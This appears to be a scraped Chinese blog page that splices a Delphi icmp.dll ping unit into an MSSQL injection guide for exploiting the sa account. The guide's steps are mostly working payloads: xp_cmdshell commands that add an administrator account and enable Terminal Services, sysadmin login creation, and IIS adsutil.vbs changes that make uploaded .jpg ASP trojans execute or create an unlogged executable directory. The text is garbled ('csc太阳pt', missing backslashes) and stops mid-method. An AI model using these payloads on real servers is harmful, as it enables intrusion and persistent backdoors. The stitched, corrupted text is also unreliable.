调用icmp.dll实现Ping功能
mssql injection之sa的利用
数据库和网站放同一服务器:
方法一:
开TS,加账户上去,具体语句如下:
;exec master.dbo.xp_cmdshell @echo [Components] > c:sql
;exec master.dbo.xp_cmdshell @echo TSEnable = on >> c:sql
;exec master.dbo.xp_cmdshell @sysocmgr /i:c:winntinfsysoc.inf /u:c:sql /q
;exec master.dbo.xp_cmdshell @del C:server
Exec Master..Xp_CmdShell net user linzi 123 /add
Exec Master..Xp_CmdShell net localgroup administrators linzi /add
方法二:
下面代码调用icmp.dll实现Ping功能。
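unit PingUnit;

interface

uses
  Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,
  ExtCtrls, StdCtrls, WinSock;

type
  { Pascal mirror of the IP_OPTION_INFORMATION structure that IcmpSendEcho
    takes for the outgoing request (and returns inside each reply). }
  PIPOptionInformation = ^TIPOptionInformation;
  TIPOptionInformation = packed record
    TTL: Byte;          // time-to-live of the echo request
    TOS: Byte;          // type of service
    Flags: Byte;        // IP header flags
    OptionsSize: Byte;  // number of bytes referenced by OptionsData
    OptionsData: PChar; // NOTE(review): may be nil in a reply; dereference only after checking
  end;

  { Pascal mirror of ICMP_ECHO_REPLY; IcmpSendEcho writes one of these at
    the start of the reply buffer, followed by the echoed data. }
  PIcmpEchoReply = ^TIcmpEchoReply;
  TIcmpEchoReply = packed record
    Address: DWORD;                 // address of the host that answered
    Status: DWORD;                  // IP_STATUS code; 0 (IP_SUCCESS) means answered
    RTT: DWORD;                     // round-trip time in milliseconds
    DataSize: Word;                 // number of reply data bytes
    Reserved: Word;
    Data: Pointer;                  // pointer to the reply data
    Options: TIPOptionInformation;  // options of the reply packet
  end;

  { Signatures of the three icmp.dll entry points resolved at run time
    (see TPingForm.FormCreate); all are stdcall. }
  TIcmpCreateFile = function: THandle; stdcall;
  TIcmpCloseHandle = function(IcmpHandle: THandle): Boolean; stdcall;
  TIcmpSendEcho = function(IcmpHandle: THandle;
                           DestinationAddress: DWORD;
                           RequestData: Pointer;
                           RequestSize: Word;
                           RequestOptions: PIPOptionInformation;
                           ReplyBuffer: Pointer;
                           ReplySize: DWORD;
                           Timeout: DWORD): DWORD; stdcall;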
  { Small ping form: FormCreate resolves icmp.dll and opens the ICMP handle,
    exebuttonClick sends one echo request to the address typed in pingedit
    and reports the reply size and round-trip time in StatusShow. }
  TPingForm = class(TForm)
    StatusShow: TMemo;   // output log; one line per reply
    Panel1: TPanel;
    pingedit: TEdit;     // destination IP address, dotted-decimal (parsed with inet_addr)
    exebutton: TButton;  // triggers exebuttonClick
    procedure FormCreate(Sender: TObject);
    procedure exebuttonClick(Sender: TObject);
  private
    { Private declarations }
    hICMP: THANDLE;                  // handle from IcmpCreateFile; NOTE(review): never closed in this unit
    IcmpCreateFile : TIcmpCreateFile;  // resolved via GetProcAddress in FormCreate
    IcmpCloseHandle: TIcmpCloseHandle; // resolved in FormCreate but not called anywhere in this unit
    IcmpSendEcho: TIcmpSendEcho;       // resolved via GetProcAddress in FormCreate
  public
    { Public declarations }
  end;

var
  PingForm: TPingForm;  // auto-created form instance
implementation
{$R *.DFM}
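{ Initialises Winsock, loads icmp.dll, resolves its three entry points and
  opens the ICMP handle used by exebuttonClick.  Every step is checked: the
  original version dereferenced whatever GetProcAddress returned, so a missing
  DLL or export crashed the form instead of reporting the problem. }
procedure TPingForm.FormCreate(Sender: TObject);
var
  WSAData: TWSAData;
  hICMPdll: HMODULE;
begin
  // Winsock 1.1 is only needed for inet_addr, but a failed startup is reported
  // rather than ignored.
  if WSAStartup($101, WSAData) <> 0 then
  begin
    MessageDlg('WSAStartup 失败!', mtError, [mbOk], 0);
    Exit;
  end;

  hICMPdll := LoadLibrary('icmp.dll');
  if hICMPdll = 0 then
  begin
    MessageDlg('无法加载 icmp.dll!', mtError, [mbOk], 0);
    Exit;
  end;

  @IcmpCreateFile := GetProcAddress(hICMPdll, 'IcmpCreateFile');
  @IcmpCloseHandle := GetProcAddress(hICMPdll, 'IcmpCloseHandle');
  @IcmpSendEcho := GetProcAddress(hICMPdll, 'IcmpSendEcho');
  // All three must resolve; a nil procedural variable would fault on first call.
  if not (Assigned(IcmpCreateFile) and Assigned(IcmpCloseHandle) and Assigned(IcmpSendEcho)) then
  begin
    MessageDlg('找不到 icmp.dll 的导出函数!', mtError, [mbOk], 0);
    Exit;
  end;

  // IcmpCreateFile reports failure with INVALID_HANDLE_VALUE, not 0.
  hICMP := IcmpCreateFile;
  if hICMP = INVALID_HANDLE_VALUE then
  begin
    MessageDlg('IcmpCreateFile 失败!', mtError, [mbOk], 0);
    Exit;
  end;

  StatusShow.Text := '';
  StatusShow.Align := alClient;
  StatusShow.Lines.Add('目的IP地址 字节数 返回时间(毫秒)');
end;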
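{ Sends a single ICMP echo request to the address in PingEdit and appends
  "address size rtt" to StatusShow when a reply arrives.

  Fixes relative to the original: the result of IcmpSendEcho was discarded and
  success was inferred by comparing the first request byte with the first byte
  at Options.OptionsData, which is a nil dereference on a timeout (the except
  handler only masked that); inet_addr's INADDR_NONE result was not checked;
  and the two buffers were not freed if anything raised.  The entry points
  resolved in FormCreate are also verified before use. }
procedure TPingForm.exebuttonClick(Sender: TObject);
var
  IPOpt: TIPOptionInformation;  // IP options for the packet to send
  FIPAddress: DWORD;
  pReqData, pRevData: PChar;
  pIPE: PIcmpEchoReply;         // ICMP echo reply buffer
  FSize: DWORD;
  MyString: string;
  FTimeOut: DWORD;
  BufferSize: DWORD;
  Replies: DWORD;
begin
  if PingEdit.Text = '' then
    Exit;

  // FormCreate may have bailed out before resolving icmp.dll.
  if (not Assigned(IcmpSendEcho)) or (hICMP = 0) or (hICMP = INVALID_HANDLE_VALUE) then
  begin
    MessageDlg('ICMP 未初始化!', mtError, [mbOk], 0);
    Exit;
  end;

  // inet_addr only parses dotted-decimal; anything else yields INADDR_NONE,
  // which must not be sent as a destination.
  FIPAddress := inet_addr(PChar(PingEdit.Text));
  if FIPAddress = INADDR_NONE then
  begin
    MessageDlg('无效的IP地址!', mtInformation, [mbOk], 0);
    Exit;
  end;

  FSize := 40;
  BufferSize := SizeOf(TIcmpEchoReply) + FSize;
  GetMem(pRevData, FSize);
  GetMem(pIPE, BufferSize);
  try
    // Zero the whole reply buffer, not just the header record.
    FillChar(pIPE^, BufferSize, 0);
    pIPE^.Data := pRevData;
    MyString := 'Hello,World';
    pReqData := PChar(MyString);
    FillChar(IPOpt, SizeOf(IPOpt), 0);
    IPOpt.TTL := 64;
    FTimeOut := 4000;  // milliseconds

    // Return value is the number of replies stored in pIPE; 0 means timeout
    // or error, in which case the reply fields carry no meaning.
    Replies := IcmpSendEcho(hICMP, FIPAddress, pReqData, Length(MyString),
                            @IPOpt, pIPE, BufferSize, FTimeOut);
    if (Replies > 0) and (pIPE^.Status = 0) then
      StatusShow.Lines.Add(PingEdit.Text + ' ' + IntToStr(pIPE^.DataSize) + ' ' + IntToStr(pIPE^.RTT))
    else
      MessageDlg('没有找到该IP地址!', mtInformation, [mbOk], 0);
  finally
    FreeMem(pRevData);
    FreeMem(pIPE);
  end;
end;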
end.
用asp.dll解析jpg格式,然后通过上传点,合法的上传一个asp木马,主要是利用Adsutil.vbs
这个脚本来实现。
具体语句是:
csc太阳pt C:InetpubAdminSc太阳ptsadsutil.vbs ENUM w3svc/3/root 得到其目录
csc太阳pt c:InetpubAdminSc太阳ptsadsutil.vbs SET W3SVC/3/Root/Sc太阳ptMaps ".jpg,c:winntsystem32inetsrvasp.dll,5,GET,HEAD,POST,TRACE" ".asp,c:winntsystem32inetsrvasp.dll,5,GET,HEAD,POST,TRACE" ".aspx,c:winntMicrosoft.NETFrameworkv1.1.4322aspnet_isapi.dll,1,GET,HEAD,POST,DEBUG"
方法三:
加个system权限的用户,然后用查询分析器连接上去
具体语句:
;exec master.dbo.sp_addlogin linzi;--
;exec master.dbo.sp_password null,linzi,linzi;--
;exec master.dbo.sp_addsrvrolemember linzi sysadmin;--
方法四:
老洞新用.构造原始的U漏洞,然后用小金写的工具连接上去,实现上传
具体语句如下:
;exec master.dbo.xp_cmdshellcopy c:winntsystem32cmd.exe c:inetpubsc太阳ptslinzi.exe
方法五:
利用Adsutil.vbs建一个有浏览,写,执行等权限的目录,然后实现上传
具体语句如下:
csc太阳pt c:InetpubAdminSc太阳ptsadsutil.vbs CREATE W3SVC/1/Root/linzi "IIsWebVirtualDir"
csc太阳pt c:InetpubAdminSc太阳ptsadsutil.vbs SET W3SVC/1/Root/linzi/AppIsolated 0
csc太阳pt c:InetpubAdminSc太阳ptsadsutil.vbs SET W3SVC/1/Root/linzi/Path "c:"
csc太阳pt c:InetpubAdminSc太阳ptsadsutil.vbs SET W3SVC/1/Root/linzi/AccessExecute 1
csc太阳pt c:InetpubAdminSc太阳ptsadsutil.vbs SET W3SVC/1/Root/linzi/AccessSource 1
csc太阳pt c:InetpubAdminSc太阳ptsadsutil.vbs SET W3SVC/1/Root/linzi/AccessRead 1
csc太阳pt c:InetpubAdminSc太阳ptsadsutil.vbs SET W3SVC/1/Root/linzi/AccessSc太阳pt 1
csc太阳pt c:InetpubAdminSc太阳ptsadsutil.vbs SET W3SVC/1/Root/linzi/AccessW太阳te 1
csc太阳pt c:InetpubAdminSc太阳ptsadsutil.vbs SET W3SVC/1/Root/linzi/Sc太阳ptMaps ".asp,c:WINDOWSsystem32inetsrvasp.dll,5,GET,HEAD,POST,TRACE" ".aspx,c:WINDOWSMicrosoft.NETFrameworkv1.1.4322aspnet_isapi.dll,1,GET,HEAD,POST,DEBUG"
csc太阳pt c:InetpubAdminSc太阳ptsadsutil.vbs SET W3SVC/1/Root/linzi/DontLog 1
csc太阳pt c:InetpubAdminSc太阳ptsadsutil.vbs SET W3SVC/1/Root/linzi/EnableDirBrowsing 1
csc太阳pt c:InetpubAdminSc太阳ptsadsutil.vbs SET W3SVC/1/Root/linzi/EnableDefaultDoc 0
然后http://ip/linzi/登上去
方法六:
暴路径,然后,写入小马,或者上传一张图木马,然后再用copy命令把扩展名改成asp
具体语句如下: